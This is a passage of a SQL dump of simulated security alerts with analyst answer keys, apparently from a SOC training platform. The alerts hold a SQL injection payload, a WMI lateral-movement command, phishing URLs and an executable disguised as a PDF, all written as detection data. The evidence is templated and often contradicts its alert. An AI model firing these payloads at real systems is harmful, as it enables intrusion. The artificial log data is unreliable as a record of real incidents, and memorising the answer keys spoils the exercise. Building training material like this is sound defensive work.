use\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.503Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T10:20:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"svc_account\\\",\\\"hostname\\\":\\\"GOV-SERVER01\\\",\\\"command_line\\\":\\\"c:\\\\\\\\windows\\\\\\\\system32\\\\\\\\net.exe use\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.503Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T10:20:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"svc_account\\\",\\\"hostname\\\":\\\"GOV-SERVER01\\\",\\\"command_line\\\":\\\"c:\\\\\\\\windows\\\\\\\\system32\\\\\\\\net.exe use\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(843, 'Phishing Email with Malicious URL', 'medium', 'Proofpoint', 'A phishing email impersonating a government official was detected, containing a malicious URL leading to credential harvesting site.', 'Phishing', 'T1566', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-14T08:15:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.22\",\"dst_ip\":\"192.168.1.101\",\"email_sender\":\"gov-official@phishingsite.com\",\"hostname\":\"GOV-MAIL01\",\"url\":\"http://malicious-site.com/login\"}', '2026-01-14 15:21:38', '2026-02-16 16:56:03', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.22\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP associated with multiple phishing attempts.\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-site.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL leads to a credential harvesting site.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"gov-official@phishingsite.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Email domain known for phishing activities.\"}}],\"expected_actions\":[\"block_url\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email contained a malicious URL linked to a phishing site, confirmed by external OSINT.\"}', 'Beginner', 'SIEM', 3, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Email with Malicious URL\",\"date\":\"2026-02-01T20:32:22.504Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(844, 'Failed Brute Force Login Attempts', 'medium', 'Wazuh', 'Multiple failed login attempts detected on an internal server, originating from a foreign IP address.', 'Brute Force', 'T1110', 0, 'investigating', NULL, '{\"timestamp\":\"2026-01-14T06:50:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.77\",\"dst_ip\":\"192.168.1.200\",\"username\":\"admin\",\"hostname\":\"GOV-APP01\",\"failed_attempts\":30}', '2026-01-14 15:21:38', '2026-03-03 12:16:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.77\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported for multiple brute force attempts globally.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Common username targeted in brute force attacks.\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The foreign IP address is associated with malicious activities, as confirmed by OSINT.\"}', 'Beginner', 'SIEM', 3, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.505Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T06:50:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"192.168.1.200\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"GOV-APP01\\\",\\\"failed_attempts\\\":30}\"},{\"timestamp\":\"2026-02-01T20:31:22.505Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T06:50:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"192.168.1.200\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"GOV-APP01\\\",\\\"failed_attempts\\\":30}\"},{\"timestamp\":\"2026-02-01T20:30:22.505Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T06:50:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"192.168.1.200\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"GOV-APP01\\\",\\\"failed_attempts\\\":30}\"},{\"timestamp\":\"2026-02-01T20:29:22.505Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T06:50:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"192.168.1.200\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"GOV-APP01\\\",\\\"failed_attempts\\\":30}\"},{\"timestamp\":\"2026-02-01T20:28:22.505Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T06:50:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"192.168.1.200\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"GOV-APP01\\\",\\\"failed_attempts\\\":30}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(845, 'Suspicious WMI Activity Detected', 'high', 'Firewall', 'Suspicious WMI activity detected originating from a compromised host attempting lateral movement within the network.', 'Lateral Movement', 'T1047', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-14T04:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.50\",\"dst_ip\":\"192.168.1.70\",\"username\":\"malicioususer\",\"hostname\":\"GOV-SERVER02\",\"command_line\":\"wmic /node:192.168.1.70 process call create calc.exe\"}', '2026-01-14 15:21:38', '2026-02-16 05:11:24', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.70\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Target internal IP address for lateral movement.\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"wmic /node:192.168.1.70 process call create calc.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"WMI command used for lateral movement.\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"Suspicious WMI command execution indicates lateral movement activity.\"}', 'Beginner', 'EDR', 3, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(846, 'False Positive - Regular User Login', 'low', 'Splunk', 'A login attempt flagged as suspicious due to multiple location changes but verified as legitimate user activity.', 'Credential Access', 'T1078', 0, 'closed', NULL, '{\"timestamp\":\"2026-01-14T09:15:00Z\",\"event_type\":\"login_success\",\"src_ip\":\"8.8.8.8\",\"dst_ip\":\"192.168.1.102\",\"username\":\"jane.smith\",\"hostname\":\"GOV-LAPTOP01\"}', '2026-01-14 15:21:38', '2026-02-18 09:08:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"8.8.8.8\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"No malicious activity reported for this IP.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jane.smith\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Legitimate user account confirmed.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_access\",\"analysis_notes\":\"User login verified as legitimate after review of travel schedule and access logs.\"}', 'Beginner', 'SIEM', 3, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.507Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T09:15:00Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"8.8.8.8\\\",\\\"dst_ip\\\":\\\"192.168.1.102\\\",\\\"username\\\":\\\"jane.smith\\\",\\\"hostname\\\":\\\"GOV-LAPTOP01\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.507Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T09:15:00Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"8.8.8.8\\\",\\\"dst_ip\\\":\\\"192.168.1.102\\\",\\\"username\\\":\\\"jane.smith\\\",\\\"hostname\\\":\\\"GOV-LAPTOP01\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.507Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T09:15:00Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"8.8.8.8\\\",\\\"dst_ip\\\":\\\"192.168.1.102\\\",\\\"username\\\":\\\"jane.smith\\\",\\\"hostname\\\":\\\"GOV-LAPTOP01\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.507Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T09:15:00Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"8.8.8.8\\\",\\\"dst_ip\\\":\\\"192.168.1.102\\\",\\\"username\\\":\\\"jane.smith\\\",\\\"hostname\\\":\\\"GOV-LAPTOP01\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.507Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T09:15:00Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"8.8.8.8\\\",\\\"dst_ip\\\":\\\"192.168.1.102\\\",\\\"username\\\":\\\"jane.smith\\\",\\\"hostname\\\":\\\"GOV-LAPTOP01\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(847, 'SQL Injection Attempt Blocked', 'high', 'Wazuh', 'A SQL injection attempt was detected and blocked by the web application firewall.', 'Web Attack', 'T1190', 0, 'Closed', 233, '{\"timestamp\":\"2026-01-14T11:00:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"198.51.100.45\",\"dst_ip\":\"192.168.1.150\",\"hostname\":\"GOV-WEB01\",\"request_body\":\"\' OR \'1\'=\'1\' --\"}', '2026-01-14 15:21:38', '2026-03-03 12:15:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in multiple web-based attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"\' OR \'1\'=\'1\' --\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"SQL injection attempt detected.\"}}],\"expected_actions\":[\"block_ip\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"SQL injection attempt confirmed by payload and IP reputation.\"}', 'Beginner', 'SIEM', 3, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.508Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T11:00:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.45\\\",\\\"dst_ip\\\":\\\"192.168.1.150\\\",\\\"hostname\\\":\\\"GOV-WEB01\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.508Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T11:00:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.45\\\",\\\"dst_ip\\\":\\\"192.168.1.150\\\",\\\"hostname\\\":\\\"GOV-WEB01\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.508Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T11:00:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.45\\\",\\\"dst_ip\\\":\\\"192.168.1.150\\\",\\\"hostname\\\":\\\"GOV-WEB01\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.508Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T11:00:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.45\\\",\\\"dst_ip\\\":\\\"192.168.1.150\\\",\\\"hostname\\\":\\\"GOV-WEB01\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.508Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T11:00:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.45\\\",\\\"dst_ip\\\":\\\"192.168.1.150\\\",\\\"hostname\\\":\\\"GOV-WEB01\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(848, 'False Positive - Unusual Network Activity', 'low', 'Firewall', 'Unusual network activity detected due to a legitimate software update process, initially flagged as suspicious.', 'Network Anomaly', 'T1071', 0, 'investigating', NULL, '{\"timestamp\":\"2026-01-14T12:30:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.120\",\"dst_ip\":\"203.0.113.88\",\"hostname\":\"GOV-UPDATE01\",\"command_line\":\"C:\\\\Program Files\\\\Updater\\\\update.exe\"}', '2026-01-14 15:21:38', '2026-03-03 12:17:09', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.120\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the update server.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.88\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"No malicious activity reported for this IP.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"network_anomaly\",\"analysis_notes\":\"Activity confirmed as part of a legitimate software update process.\"}', 'Beginner', 'EDR', 3, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(849, 'Credential Harvesting Attempt via Phishing Email', 'high', 'Proofpoint', 'A phishing email targeting user credentials was detected. The email contained a malicious link disguised as an Office365 login page.', 'Phishing', 'T1566', 1, 'Closed', 225, '{\"timestamp\":\"2026-01-14T09:15:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.50\",\"username\":\"jane.doe@retailcorp.com\",\"hostname\":\"mailserver.retailcorp.com\",\"email_sender\":\"no-reply@office365-login.com\",\"url\":\"http://office365-login.com/login\"}', '2026-01-14 15:31:54', '2026-03-06 10:15:27', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 500 times for phishing attacks\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://office365-login.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Known phishing URL targeting Office365 credentials\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"no-reply@office365-login.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Spoofed domain used for phishing campaigns\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email contained a known phishing URL and originated from a malicious IP.\"}', 'Beginner', 'SIEM', 3, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Credential Harvesting Attempt via Phishing Email\",\"date\":\"2026-02-01T20:32:22.511Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(850, 'SQL Injection Attempt Detected on E-commerce Platform', 'critical', 'Wazuh', 'A web request containing SQL injection payload was detected on the payment processing page of the e-commerce site.', 'Web Attack', 'T1059', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-14T11:30:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"45.33.32.156\",\"dst_ip\":\"192.168.1.45\",\"hostname\":\"webserver.ecommerce.com\",\"request_body\":\"\' OR \'1\'=\'1\' --\"}', '2026-01-14 15:31:54', '2026-02-16 17:57:43', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"45.33.32.156\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in multiple SQL injection attempts\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"\' OR \'1\'=\'1\' --\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"SQL injection attempt detected\"}}],\"expected_actions\":[\"block_ip\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The request body contained a clear SQL injection payload targeting the payment page.\"}', 'Beginner', 'EDR', 3, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.512Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T11:30:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"45.33.32.156\\\",\\\"dst_ip\\\":\\\"192.168.1.45\\\",\\\"hostname\\\":\\\"webserver.ecommerce.com\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.512Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T11:30:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"45.33.32.156\\\",\\\"dst_ip\\\":\\\"192.168.1.45\\\",\\\"hostname\\\":\\\"webserver.ecommerce.com\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.512Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T11:30:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"45.33.32.156\\\",\\\"dst_ip\\\":\\\"192.168.1.45\\\",\\\"hostname\\\":\\\"webserver.ecommerce.com\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.512Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T11:30:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"45.33.32.156\\\",\\\"dst_ip\\\":\\\"192.168.1.45\\\",\\\"hostname\\\":\\\"webserver.ecommerce.com\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.512Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T11:30:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"45.33.32.156\\\",\\\"dst_ip\\\":\\\"192.168.1.45\\\",\\\"hostname\\\":\\\"webserver.ecommerce.com\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(851, 'Suspicious Login Attempt from Foreign IP', 'medium', 'Splunk', 'Multiple failed login attempts detected for a user account from an unusual foreign IP address.', 'Credential Attack', 'T1078', 0, 'resolved', NULL, '{\"timestamp\":\"2026-01-14T12:00:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"185.234.217.40\",\"username\":\"john.smith\",\"hostname\":\"auth.retailcorp.com\",\"failed_attempts\":15}', '2026-01-14 15:31:54', '2026-02-16 16:54:56', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.234.217.40\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP associated with suspicious login 